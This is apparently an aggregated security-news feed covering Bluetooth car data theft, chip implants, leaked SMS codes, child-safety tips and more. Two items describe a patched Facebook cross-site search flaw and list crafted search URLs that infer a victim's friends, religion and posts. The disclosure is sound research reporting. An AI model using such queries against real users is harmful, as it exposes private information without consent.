Instagram’s download your data tool exposed users’ passwords to public view

By Waqas

Facebook somehow manages to make headlines one way or the other. Last week we were all praises for the social network for introducing the Unsend feature in the Messenger app and this week we are despising the company’s lack of interest in offering fool-proof security to its users after bug in Instagram’s download your data tool. […]

This is a post from HackRead.com Read the original post: Instagram’s download your data tool exposed users’ passwords to public view

CarsBlues Bluetooth attack Affects tens of millions of vehicles

The CarsBlues attack leverages security flaws in the infotainment systems installed in several types of vehicles via Bluetooth to access user PII.

A new Bluetooth hack, dubbed CarsBlues, potentially affects millions of vehicles, Privacy4Cars warns. The CarsBlues attack leverages security flaws in the infotainment systems installed in several types of vehicles via Bluetooth, it affects users who have synced their smartphone to their cars.

Privacy4Cars develops a mobile app for erasing PII from vehicles, according to the firm tens of millions of vehicles could be affected worldwide, and it is an optimistic estimate because the number could be much greater.

The riskiest scenario sees drivers who sync their phones to vehicles that have been rented, borrowed, or leased and returned. Their data might be exposed to attackers that can use them for various malicious purposes.

“The attack can be performed in a few minutes using inexpensive and readily available hardware and software and does not require significant technical knowledge.” reads the post published by the company.

“As a result of these findings, it is believed that users across the globe who have synced a phone to a modern vehicle may have had their privacy threatened. It is estimated that tens of millions of vehicles in circulation are affected worldwide, with that number continuing to rise into the millions as more vehicles are evaluated.”

CarsBlues Bluetooth attack

The attack technique was discovered by Privacy4Cars founder Andrea Amico in February 2018, he immediately notified the Automotive Information Sharing and Analysis Center (Auto-ISAC).

Amico worked with Auto-ISAC to figure out how attackers could steal PII from vehicles manufactured by affected members. Attackers can access stored contacts, call logs, text logs, and in some cases text messages without the user’s mobile device being connected to the system.

The good news for drivers is that at least manufacturers have already provided updates to make their latest models immune to the CarsBlues attack.

“Now that we have completed our ethical disclosure with the Auto-ISAC, we are turning our focus to educating the industry and the public about the risks associated with leaving personal information in vehicle systems,” explained Amico.

“The CarsBlues hack, given its ease to replicate, the breadth of situations in which it can be performed against unsuspecting targets, and the difficulty in detecting the exploitation, is a clear indication that industry and consumers alike need to be proactive when it comes to deleting personally identifiable information from vehicle infotainment systems.”

Privacy4Cars suggests vehicle users delete personal data from infotainment systems before allowing other access to their vehicle.

The firm also urges regulators to propose best practice to protect consumer data and to force vendors in implementing systems to helping customers delete their personal information.

Pierluigi Paganini

(Security Affairs – CarsBlues, privacy)

The post CarsBlues Bluetooth attack Affects tens of millions of vehicles appeared first on Security Affairs.

How I Got Locked Out of the Chip Implanted In My Hand

Motherboard staff writer Daniel Oberhaus writes: If I had a single piece of advice for anyone thinking about getting an NFC chip implant it would be to do it sober.... [A]t the urging of everyone at the implant station, the first thing I did with my implant was secure it with a four-digit pin. I hadn't decided what sort of data I wanted to put on the chip, but I sure as hell didn't want someone else to write to my chip first and potentially lock me out. I chose the same pin that I used for my phone so I wouldn't forget it in the morning -- or at least, I thought I did.... I spent most of my first day as a cyborg desperately cycling through the various pin possibilities that made it impossible for me to unlock the NFC chip in my hand and add data to it. He remained locked out of his own implanted microchip for over a year. But even when he regained access, "a part of me wants to leave it blank. After a year of living with a totally useless NFC implant, I kind of started to like it. "That small, almost imperceptible little bump on my left hand was a constant reminder that even the most sophisticated and fool-proof technologies are no match for human incompetence."

Read more of this story at Slashdot.

More Companies Plan To Implant Microchips Into Their Employees’ Hands

"British companies are planning to microchip some of their staff in order to boost security and stop them accessing sensitive areas," reports the Telegraph. "Biohax, a Swedish company that provides human chip implants, told the Telegraph it was in talks with a number of UK legal and financial firms to implant staff with the devices." An anonymous reader quote Zero Hedge: It is really happening. At one time, the idea that large numbers of people would willingly allow themselves to have microchips implanted into their hands seemed a bit crazy, but now it has become a reality. Thousands of tech enthusiasts all across Europe have already had microchips implanted, and now a Swedish company is working with very large global employers.... For security-obsessed corporations, this sort of technology can appear to have a lot of upside. If all of your employees are chipped, you will always know where they are, and you will always know who has access to sensitive areas or sensitive information. According to a top official from Biohax, the procedure to implant a chip takes "about two seconds...." Of course once this technology starts to be implemented, there will be some workers that will object. But if it comes down to a choice between getting the implant or losing their jobs, how many workers do you think will choose to become unemployed? Engadget provides more examples, pointing out that in 2006 an Ohio surveillance firm had two employees in its secure data center implant RFIDs in their triceps, and that just last year 80 employees at Three Square Market in Wisconsin had chips implanted into their hands. Their article also hints that "no one's thinking about the inevitable DEF CON talk 'Chipped employees: Fun with attack vectors'" Dr. Stewart Southey, the Chief Medical Officer at Biohax International, describes the technology as "a secure way of ensuring that a person's digital identity is linked to their physical identity," with a syringe injecting the chip directly between their thumb and forefinger to enable near-field communication. But what do Slashdot's readers think? Would you let your employer microchip you?

Read more of this story at Slashdot.

A Leaky Database of SMS Text Messages Exposed Password Resets and Two-Factor Codes

A database which contained millions of text messages used to authenticate users signing into websites was left exposed to the internet without a password. From the report: The exposed server belongs to Voxox (formerly Telcentris), a San Diego, Calif.-based communications company. The server wasn't protected with a password, allowing anyone who knew where to look to peek in and snoop on a near-real-time stream of text messages. For Sebastien Kaul, a Berlin-based security researcher, it didn't take long to find. Although Kaul found the exposed server on Shodan, a search engine for publicly available devices and databases, it was also attached to to one of Voxox's own subdomains. Worse, the database -- running on Amazon's Elasticsearch -- was configured with a Kibana front-end, making the data within easily readable, browsable and searchable for names, cell numbers and the contents of the text messages themselves.

Read more of this story at Slashdot.

Shoddy security of popular smartwatch lets hackers access your child’s location

By Waqas

Smartwatches are generally considered safe to keep track of your kids when they are outside the home. However, there is a scary new revelation about this seemingly reliable gadget that it is possible to hack GPS-enabled smartwatches. Probably a majority of children wear smartwatches these days, and the fact that one of the most popular […]

This is a post from HackRead.com Read the original post: Shoddy security of popular smartwatch lets hackers access your child’s location

Fake Fingerprints Can Imitate Real Ones In Biometric Systems, Research Shows

schwit1 shares a report: Researchers have used a neural network to generate artificial fingerprints that work as a "master key" for biometric identification systems and prove fake fingerprints can be created. According to a paper [PDF] presented at a security conference in Los Angeles, the artificially generated fingerprints, dubbed "DeepMasterPrints" by the researchers from New York University, were able to imitate more than one in five fingerprints in a biometric system that should only have an error rate of one in a thousand. The researchers, led by NYU's Philip Bontrager, say that "the underlying method is likely to have broad applications in fingerprint security as well as fingerprint synthesis." As with much security research, demonstrating flaws in existing authentication systems is considered to be an important part of developing more secure replacements in the future. In order to work, the DeepMasterPrints take advantage of two properties of fingerprint-based authentication systems. The first is that, for ergonomic reasons, most fingerprint readers do not read the entire finger at once, instead imaging whichever part of the finger touches the scanner.

Read more of this story at Slashdot.

What’s keeping Europe’s top infosec pros awake at night?

As the world adapts to GDPR and puts more attention on personal privacy and security, Europe’s top information security professionals still have doubts about the industry’s ability to protect critical infrastructure, corporate networks, and personal information. Black Hat Europe’s new research report entitled, Europe’s Cybersecurity Challenges, details the thoughts that are keeping Europe’s top information security professionals awake at night. The report includes new insights directly from more than 130 survey respondents and spans topics … More

The post What’s keeping Europe’s top infosec pros awake at night? appeared first on Help Net Security.

Smashing Security #104: The world’s most evil phishing test, and cyborgs in the workplace

Smashing Security #104: The world's most evil phishing test, and cyborgs in the workplace

Does your employer want to turn you into a cyborg? Was this phishing test devised by an evil genius? And how did a cinema chain get scammed out of millions, time and time again…?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Scott Helme.

5 Privacy Mistakes that Leave You Vulnerable Online

By John Mason

When news broke about Cambridge Analytica, the Internet went into a frenzy: “How could Facebook do this!” “Facebook should be made accountable!” Besides the fact that I think the whole Cambridge Analytica issue was blown out of proportion, I believe bigger issue is the fact that very few people are willing to be responsible for their […]

This is a post from HackRead.com Read the original post: 5 Privacy Mistakes that Leave You Vulnerable Online

Eraser – Windows Secure Erase Hard Drive Wiper

Eraser – Windows Secure Erase Hard Drive Wiper

Eraser is a hard drive wiper for Windows which allows you to run a secure erase and completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns.

Eraser is a Windows focused hard drive wiper and is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7,8 ,10 and Windows Server 2012.

Read the rest of Eraser – Windows Secure Erase Hard Drive Wiper now! Only available at Darknet.

Facebook flaw could have exposed private info of users and their friends

Security experts from Imperva reported a new Facebook flaw that could have exposed private info of users and their friends

A new security vulnerability has been reported in Facebook, the flaw could have been exploited by attackers to obtain certain personal information about users and their network of contacts.

The recently discovered issue raises once again the concerns about the privacy of the users of social network giant.

The vulnerability was discovered by security experts from Imperva, it resides in the way Facebook search feature displays results for queries provided by the users.

The good news for Facebook users is that this flaw has already been patched and did not allow attackers to conduct massive scraping of the social network for users’ information.

The page used to display the results of the users’ queries includes iFrame elements associated with each result, experts discovered that the URLs associated to those iFrames is vulnerable against cross-site request forgery (CSRF) attacks.

The exploitation of the flaw is quite simple, an attacker only needs to trick users into visiting a specially crafted website on their web browser where they have already logged into their Facebook accounts.

The website includes a javascript code that will get executed in the background when the victim clicks anywhere on that page.

“For this attack to work we need to trick a Facebook user to open our malicious site and click anywhere on the site, (this can be any site we can run JavaScript on) allowing us to open a popup or a new tab to the Facebook search page, forcing the user to execute any search query we want.” reads the analysis published by Imperva.

“Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property.

By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user.”

Searching something like “pages I like named `Imperva`” the exports noticed they were forcing the social network to return one result if the user liked the Imperva page or zero results if not.

Composing specific queries it was possible to extract data about the user’s friends, below some interesting examples of queries provided by the experts:

  • Check if the current Facebook users have friends from Israel: https://www.facebook.com/search/me/friends/108099562543414/home-residents/intersect
  • Check if the user has friends named “Ron”: https://www.facebook.com/search/str/ron/users-named/me/friends/intersect
  • Check if the user has taken photos in certain locations/countries: https://www.facebook.com/search/me/photos/108099562543414/photos-in/intersect
  • Check if the current user has Islamic friends: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/intersect
  • Check if the current user has Islamic friends who live in the UK: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/106078429431815/residents/present/intersect
  • Check if the current user wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_me%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
  • Check if the current user’s friends wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_friends%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies

Below the video PoC published by Imperva:

The process can be repeated without the need for new popups or tabs to be open because the attacker can control the location property of the Facebook window using the following code.Facebook flaw

Experts pointed out that mobile users are particularly exposed to such kind of attack because it is easy for them to forget open windows in the background allowing attackers to extract the results for multiple queries.

Imperva reported the flaw to Facebook through the company’s vulnerability disclosure program in May 2018, and the social network addressed the problem in a few days implementing CSRF protections.

Pierluigi Paganini

(Security Affairs – BCMPUPnP_Hunter botnet, hacking)

The post Facebook flaw could have exposed private info of users and their friends appeared first on Security Affairs.

Facebook Messenger to offer Unsend feature to delete sent messages

By Waqas

Facebook has made many efforts so far to refine its Messenger app. This year in May, Facebook CEO Mark Zuckerberg along with other executives of the social network admitted that the Facebook Messenger has to be refined since the current app contained many useless features while lacked critically important ones. Such as, its UI could […]

This is a post from HackRead.com Read the original post: Facebook Messenger to offer Unsend feature to delete sent messages

Patched Facebook Vulnerability Could Have Exposed Private Information About You and Your Friends

In a previous blog we highlighted a vulnerability in Chrome that allowed bad actors to steal Facebook users’ personal information; and, while digging around for bugs, thought it prudent to see if there were any more loopholes that bad actors might be able to exploit.

What popped up was a bug that could have allowed other websites to extract private information about you and your contacts.

Having reported the vulnerability to Facebook under their responsible disclosure program in May 2018, we worked with the Facebook Security Team to mitigate regressions and ensure that the issue was thoroughly resolved.

Identifying the Threat

Throughout the research process for the Chrome piece, I browsed Facebook’s online search results, and in their HTML noticed that each result contained an iframe element — probably used for Facebook’s own internal tracking. Being pretty familiar with the unique cross-origin behavior of iframes, I came up with the following technique:

To start, let’s take a look at the Facebook search page, we have an endpoint that expects a GET request with a number of search parameters. The endpoint, like most search endpoints, is not cross-site request forgery (CSRF) protected, which normally allows users to share the search results page via a URL.

This is fine in most cases since no action is being made by the user, making this CSRF attack meaningless by itself. The thing is, iFrames, unlike most web elements, are exposed in part to cross-origin documents; combine that with the search CSRF issue and you have a real problem on your hands.

Check out the proof of concept here:

Attack Flow

For this attack to work we need to trick a Facebook user to open our malicious site and click anywhere on the site, (this can be any site we can run JavaScript on) allowing us to open a popup or a new tab to the Facebook search page, forcing the user to execute any search query we want.

Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property.

By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user.

For example, by searching: “pages I like named `Imperva`” we force Facebook to return one result if the user liked the Imperva page or zero results if not:

Similar queries can be composed to extract data about the user’s friends. For example, by searching “my friends who like Imperva” I can check if the current user has any friends who like the Imperva Facebook page.

Other interesting examples of the kind of data it was possible to extract:

  • Check if the current Facebook users have friends from Israel: https://www.facebook.com/search/me/friends/108099562543414/home-residents/intersect
  • Check if the user has friends named “Ron”: https://www.facebook.com/search/str/ron/users-named/me/friends/intersect
  • Check if the user has taken photos in certain locations/countries: https://www.facebook.com/search/me/photos/108099562543414/photos-in/intersect
  • Check if the current user has Islamic friends: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/intersect
  • Check if the current user has Islamic friends who live in the UK: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/106078429431815/residents/present/intersect
  • Check if the current user wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_me%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
  • Check if the current user’s friends wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_friends%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies

This process can be repeated without the need for new popups or tabs to be open since the attacker can control the location property of the Facebook window by running the following code:

This is especially dangerous for mobile users, since the open tab can easily get lost in the background, allowing the attacker to extract the results for multiple queries, while the user is watching a video or reading an article on the attacker’s site.

As a researcher, it was a privilege to have contributed to protecting the privacy of the Facebook user community, as we continuously do for our own Imperva community.

The post Patched Facebook Vulnerability Could Have Exposed Private Information About You and Your Friends appeared first on Blog.

Anonymous use of messengers in Russia is prohibited


After 180 days, all messengers will be required to identify their users by phone numbers of operators. Prime Minister Dmitry Medvedev signed a government resolution approving the relevant rules last week. He believes that this is necessary for the safety and convenience of users.

The administrators of the messenger will check the information about the correctness of the number. The mobile operator is given 20 minutes to process the request from the Service.

Services will be available only to persons to whom the phone number is issued. In addition, mobile operators will enter information into their databases about which applications their customers are using.

According to the Head of Roskomnadzor Alexander Zharov, anonymous use of messengers prevents to investigate crimes. "The possibility of anonymous communication in messengers complicates the activities of Law Enforcement Agencies in the investigation of crimes."

In turn, the experts were skeptical about the initiative. Thus, the Director of the Association of professional users of social networks and messengers Vladimir Zykov believes that foreigners may face problems with SIM-cards of their countries. In addition, illegal sale of SIM cards of foreign operators may begin.

According to citizens, the legalization of relations between messengers and operators will only lead to negative consequences: the increase in the price of tariffs, the disappearance of anonymity in messengers, the growth of hacker attacks.

In General, the Russians do not believe that these rules will work at all. As we remember, Roskomnadzor's attempt to destroy Telegram led to the blocking of thousands of IP addresses and serious financial losses of innocent companies. And the messenger continued to work.
 

What Parents Need to Know About Live-Stream Gaming Sites Like Twitch

Live-Stream GamingClash of Clans, Runescape, Fortnite, Counter Strike, Battlefield V, and Dota 2. While these titles may not mean much to those outside of the video gaming world, they are just a few of the wildly popular games thousands of players are live streaming to viewers worldwide this very minute. However, with all the endless hours of entertainment this cultural phenomenon offers tweens, teens, and even adults, it also comes with some risks attached.

The What

Each month more than 100,000 people log onto sites like Twitch and YouTube to watch gamers play. Streamers, also called twitchers, broadcast their gameplay live online while others watch and participate through a chat feature. Each gamer attracts an audience (a few dozen to hundreds of thousands daily) based on his or her skill level and the kind of commentary, and interaction with viewers they offer.

Reports state that video game streaming can attract more viewers than some of cable’s most popular televisions shows.

The Why

Ask any streamer (or viewer) why they do it, and many will tell you it’s to showcase and improve their skills and to be part of a community of people who are equally as passionate about gaming.

Live-Stream Gaming

Live streaming is also free and global so gamers from any country can connect in any language. You’ll find streamers playing games in Turkish, Russian, Spanish, and the list goes on. Many streamers have gone from amateurs to gaming celebrities with elaborate production and marketing of their Twitch or YouTube feeds.

Some streamers hold marathon streaming sessions, and multi-player competitions designed to benefit charities. Twitch is also appealing because it allows users to watch popular gaming conventions such as TwitchCon, E3, and Comic-Con. There are also live gaming talk shows and podcasts and a channel where users can watch people do everyday things like cook, create pieces or art or play music.

The Risks

Although Twitch’s community guidelines prohibit violent behavior, sexual content, bullying and harassment, after browsing through some of the  live games, many users don’t seem to take the guidelines seriously.

Here are just a few things to keep in mind if your kids frequent live streaming communities like Twitch.

  1. Bullying. Bullying happens on every social network in some form. Twitch is no different. In one study, over 13% of respondents said they felt personally attacked on Twitch, and more than 27% have witnessed racial or gender-based bullying in live streaming.Live-Stream Gaming
  2. Crude language. While there are streamers who put a big emphasis on keeping things clean, most Twitch streamers do not. Some streamers will put up a “mature content” warning before you click on their site. Both streamers and viewers can get harsh with language, conversations, and points of view.
  3. Violent games. Many of the games on Twitch are violent and intended for mature viewers. However, you can also find some more mild games such as Minecraft and Mario Brothers if your kids are younger. The best way to access a game’s violence is to sit and watch it with your child.
  4. Health risks. Sitting and playing video games for extended periods of time can affect players and viewers physical and emotional well-being. In the most extreme cases, gamers have died due to excessive gaming.
  5. Costs. Twitch is free to sign-up and watch games, but if you want the extras (no ads), it’s $8.99 a month. Viewers can also subscribe to individual gamers’ feed. Viewers can also purchase “bits” to cheer on their favorite players (kind of like badges), which can add up quickly.
  6. Stalking. Viewers have been known to stalk, harass, rob, and try to meet celebrity streamers. Recently, Twitch announced both private and public chat rooms to try to boost privacy among users.
  7. Live-Stream GamingSwatting. An increasingly popular practice called “swatting” involves reporting a fake emergency at the home of the victim in order to send a SWAT team to barge in on them. In some cases, swatter cases connected to Twitch have ended tragically.
  8. Wasted time. Marathon gaming sessions, skipping school to play or view games, and gaming through the night are common in Twitch communities. Twitch, like any other social network, needs parental attention and ground rules.
  9. Privacy. Spending a lot of time with people in an online “community” can result in a false sense of trust. Often kids will answer an innocent question in a live chat such as where they live or what school they go to. Leaking little bits of information over time allows a corrupt person to piece together a picture of your data.

An endnote: If your kids love Twitch or live stream gaming on YouTube or other sites, spend some time on those sites. Listen to the conversations your kids are having with others online. What’s the tone? Is there too much sarcasm or cruel “joking” going on? Put time limits on screen time and remember balance and monitoring is key to guiding healthy online habits.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

 

The post What Parents Need to Know About Live-Stream Gaming Sites Like Twitch appeared first on McAfee Blogs.

Privacy and Security of Data at Universities

Interesting paper: "Open Data, Grey Data, and Stewardship: Universities at the Privacy Frontier," by Christine Borgman:

Abstract: As universities recognize the inherent value in the data they collect and hold, they encounter unforeseen challenges in stewarding those data in ways that balance accountability, transparency, and protection of privacy, academic freedom, and intellectual property. Two parallel developments in academic data collection are converging: (1) open access requirements, whereby researchers must provide access to their data as a condition of obtaining grant funding or publishing results in journals; and (2) the vast accumulation of "grey data" about individuals in their daily activities of research, teaching, learning, services, and administration. The boundaries between research and grey data are blurring, making it more difficult to assess the risks and responsibilities associated with any data collection. Many sets of data, both research and grey, fall outside privacy regulations such as HIPAA, FERPA, and PII. Universities are exploiting these data for research, learning analytics, faculty evaluation, strategic decisions, and other sensitive matters. Commercial entities are besieging universities with requests for access to data or for partnerships to mine them. The privacy frontier facing research universities spans open access practices, uses and misuses of data, public records requests, cyber risk, and curating data for privacy protection. This Article explores the competing values inherent in data stewardship and makes recommendations for practice by drawing on the pioneering work of the University of California in privacy and information security, data governance, and cyber risk.

Don’t Mix the Two Up: What Is the Difference Between Privacy & Security?

Knowing that a tomato is a fruit is knowledge – not adding it to a fruit salad is wisdom. Similarly, having knowledge about privacy and security is good, but true wisdom is knowing that they are vastly different from each other. While both, to some extent, revolve around the protection of your personal, public and […]… Read More

The post Don’t Mix the Two Up: What Is the Difference Between Privacy & Security? appeared first on The State of Security.

IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle

Internet Of ThingsIf you took an inventory of your digital possessions chances are, most of your life — everything from phones to toys, to wearables, to appliances — has wholly transitioned from analog to digital (rotary to wireless). What you may not realize is that with this dramatic transition, comes a fair amount of risk.

Privacy for Progress

With this massive tech migration, an invisible exchange has happened: Privacy for progress. Here we are intentionally and happily immersed in the Internet of Things (IoT). IoT is defined as everyday objects with computing devices embedded in them that can send and receive data over the internet.

That’s right. Your favorite fitness tracking app may be collecting and giving away personal data. That smart toy, baby device, or video game may be monitoring your child’s behavior and gathering information to influence future purchases. And, that smart coffee maker may be transmitting more than just good morning vibes.

Gartner report estimated there were 8.4 billion connected “things” in 2017 and as many as 20 billion by 2020. The ability of some IoT devices is staggering and, frankly, a bit frightening. Data collection ability from smart devices and services on the market is far greater than most of us realize. Rooms, devices, and apps come equipped with sensors and controls that can gather and inform third parties about consumers.

Internet Of Things

Lockdown IoT devices:

  • Research product security. With so many cool products on the market, it’s easy to be impulsive and skip your research but don’t. Read reviews on a product’s security (or lack of). Going with a name brand that has a proven security track record and has worked out security gaps may be the better choice.
  • Create new passwords. Most every IoT device will come with a factory default password. Hackers know these passwords and will use them to break into your devices and gain access to your data. Take the time to go into the product settings (general and advanced) and create a unique, strong password.
  • Keep product software up-to-date. Manufacturers often release software updates to protect customers against vulnerabilities and new threats. Set your device to auto-update, if possible, so you always have the latest, safest upgrade.
  • Get an extra layer of security. Managing and protecting multiple devices in our already busy lives is not an easy task. To make sure you are protected consider investing in software that will give you antivirus, identity and privacy protection for your PCs, Macs, smartphones, and tablets—all in one subscription.
  • Stay informed. Think about it, crooks make it a point to stay current on IoT news, so shouldn’t we? Stay a step ahead by staying informed. Keep an eye out for any news that may affect your IoT security (or specific products) by setting up a Google alert.Internet Of Things

A connected life is a good life, no doubt. The only drawback is that criminals fully understand our growing dependence and affection for IoT devices and spend most of their time looking for vulnerabilities. Once they crack our network from one angle, they can and reach other data-rich devices and possibly access private and financial data.

As Yoda says, “with much power comes much responsibility.” Discuss with your family the risks that come with smart devices and how to work together to lock down your always-evolving, hyper-connected way of life.

Do you enjoy podcasts and wish you could find one that helps you keep up with digital trends and the latest gadgets? Then give McAfee’s podcast Hackable a try.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

 

The post IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle appeared first on McAfee Blogs.

Smashing Security #102: Ethical dilemmas, Girl Scouts, and porn-loving US officials

Smashing Security #102: Ethical dilemmas, Girl Scouts, and porn-loving US officials

Who deserves to die in a driverless car crash? Who has been sniffing around the Girl Scouts’ email account? And just how long would it take for a geologist to visit 9,000 adult web pages?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by journalist and “Friends” fan Dan Raywood.